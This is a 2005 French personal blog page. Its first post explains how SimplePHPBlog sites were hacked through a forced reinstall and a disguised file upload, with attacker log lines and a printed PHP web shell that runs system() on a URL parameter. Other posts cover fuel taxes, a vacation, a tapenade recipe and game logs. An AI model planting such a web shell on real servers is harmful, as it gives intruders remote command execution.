Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 41

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 48

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 55

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 61
Mon Blog, ça vient - Une grosse faille de sécurité de SimplePHPBlog
 

Une grosse faille de sécurité de SimplePHPBlog 

La faille

Une faille de sécurité connue a été utilisée contre le site principal de SimplePHPBlog le 3 septembre 2005.
Ensuite un grand nombre de blogs utilisant SimplePHPBlog ont été piratés dans les jours suivants (ce qui se traduit ici par ce message à conserver en souvenir).

Les visiteurs venus d'ailleurs

Deux visites, le 4 septembre puis le 7 septembre:
weblog.bajoit.net 82.231.77.60 - - [04/Sep/2005:03:20:10 +0200] "GET /install00.php HTTP/1.1" 200 9355
weblog.bajoit.net 213.240.239.4 - - [07/Sep/2005:23:03:30 +0200] "GET /install00.php HTTP/1.1" 200 9388

Comment ça marche?

Une première faille permettait d'effacer un fichier créé lors de l'installation, de manière à forcer une nouvelle exécution des scripts d'installation. Il était alors possible de créer un nouvel utilisateur qui pouvait par exemple ajouter un message (ou pire).

Une seconde faille permettait d'importer (en tant que nouveau gestionnaire) comme image un fichier exécutable, qui pouvait à son tour accéder au serveur via PHP.

Un bon exemple:
<?php
$cmd = $_GET['cmd'];
echo '<hr/><pre>';
echo 'Command: ' . $cmd;
echo '</pre><hr/><br>';

echo '<pre>';
$last_line = system($cmd,$output);
echo '</pre><hr/>';
?>.
Mais dans ce cas précis, les commandes PHP trop dangereuses sont désactivées chez PHPNET.

Pourquoi?

Beaucoup d'utilisateurs se demandent ou est le problème: qualité, open-source, système basé sur des fichiers texte?
En tout cas, la publication de la faille a beaucoup aidé les pirates, et malgré tout il vaut mieux publier les failles que de les garder secrètes.
Et une version corrigée 4 jours après le problème ce n'est pas aussi bien que Mozilla (qui a été capable de publier la version résistante à une faille en moins de 24 heures) mais ce n'est pas mal!
( 1004 lectures )   |  permalien ( 3.2 / 935 )
Le carburant plus cher ou moins cher? 

Les grands consommateurs demandent une plus grande diminution des taxes sur le carburant pour absorber la montée du prix de base.
La menace est de bientôt revoir sur les autoroutes des routiers qui font un barbecue à côté de leurs camions bloquant l'autoroute.

En fait cette diminution des taxes est une très mauvaise idée: pourquoi ne pas laisser à son juste prix un produit dont il ne faut pas encourager l'utilisation?
Le transport routier qui passerait au double de son prix actuel, ce n'est pas moins de clients, moins de camions, moins de pollution?
( 563 lectures )   |  permalien ( 3 / 1175 )
hmm... 


WTF? that's just a hack.
( 623 lectures )   |  permalien ( 3 / 954 )
Vacances pas loin, mais bien 

Et une petite semaine de vacances à Colleville, aussi connue comme Omaha Beach.

On venait pour voir les crabes et les petites crevettes et pour dormir bercés par le bruit des vagues, on a eu en prime les cours de catamaran (Nicolas), les promenades sur les falaises (Benoit), les touristes américains, la terrible teurgoule et la sympathique rencontre avec Garga à Rouen.
( 798 lectures )   |  permalien ( 2.9 / 1515 )
La tapenade de poivrons 

Introduction

D'inspiration méditerranéenne, voici une recette de tapenade originale et piquante.

Ingrédients

La liste d'ingrédients permet de réaliser la recette pour obtenir un bol de tapenade.

Les ingrédients sont les suivants:
  • 3 poivrons rouges,
  • 200g de feta,
  • 2 éclats d'ail,
  • poivre,
  • sauce au piment,
  • huile d'olive (3c à soupe).

Préparation

La préparation de cette recette demande environ 30 minutes.

Voici les quelques étapes de la préparation:
  1. couper les poivrons en 4,
  2. griller les poivrons dans le four, peau vers le haut, jusqu'à ce que la peau fasse une cloque,
  3. laisser refroidir et transpirer les poivrons dans une assiette couverte,
  4. dans un grand plat, mixer les poivrons pelés, l'ail et l'huile d'olive,
  5. assaisonner avec le poivre et le piment.

Présentation et conseils

Servir sur des tranches de baguette grillées.
Comme les plats froids, le saveur de ce plat s'exprime quelques heures après la fin de la préparation.
( 1046 lectures )   |  permalien ( 3 / 1613 )
Les aventures de Sleep 

Sleep (9320) continue sa vie dangereuse au -1, avec je l'avoue une certaine efficacité (et félicitations personnelles pour avoir tué Garbakan' et traverseLaroute*) :
30/06/2005 11:03:48 MORT Sleep (9320) a tué Garbakan' (9480) qui réapparaîtra à la surface de MountyHall.
27/06/2005 11:09:36 MORT Sleep (9320) a tué Trollotov (15340) qui réapparaîtra à la surface de MountyHall.
22/06/2005 22:49:37 MORT RED is BLOOD (4599) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
15/06/2005 19:00:43 MORT Sleep (9320) a tué TomDom (38001) qui réapparaîtra à la surface de MountyHall.
11/06/2005 18:59:07 MORT Karibou (16717) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
08/06/2005 16:31:27 MORT Sleep (9320) a tué Memepa (4949) qui réapparaîtra à la surface de MountyHall.
02/06/2005 07:58:11 MORT un Fungus Violet [Nouveau] (653030) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
31/05/2005 20:18:22 MORT Sleep (9320) a tué Leviathan (37536) qui réapparaîtra à la surface de MountyHall.
27/05/2005 10:24:25 MORT Mayauel (984) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
20/05/2005 02:03:48 MORT Beric (530) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
14/05/2005 07:15:46 MORT Sleep (9320) a tué Xaxxa (44463) qui réapparaîtra à la surface de MountyHall.
11/05/2005 10:04:27 MORT shouka (2243) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
08/05/2005 20:31:04 MORT Sleep (9320) a tué Balthor le robuste (9796) qui réapparaîtra à la surface de MountyHall.
06/05/2005 20:29:44 MORT Sleep (9320) a tué Lordnao (34809) qui réapparaîtra à la surface de MountyHall.
30/04/2005 00:07:36 MORT puitepe (13804) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
28/04/2005 18:13:08 MORT Sleep (9320) a tué traverseLaroute* (28982) qui réapparaîtra à la surface de MountyHall.
27/04/2005 18:32:12 MORT Sleep (9320) a tué GrosProut (39016) qui réapparaîtra à la surface de MountyHall.
23/04/2005 18:17:01 MORT STEPHAN (5158) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
21/04/2005 13:29:56 MORT Sleep (9320) a tué Sir Rav' (20712) qui réapparaîtra à la surface de MountyHall.
15/04/2005 06:54:11 MORT Shkrouf (21324) a tué Sleep (9320) qui réapparaîtra à la surface de MountyHall.
Une autre morale de l'histoire: faites gaffe au Fungus Violet, c'est méchant!
( 709 lectures )   |  permalien ( 3.1 / 1184 )

<< <Précédent | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | Suivant> >>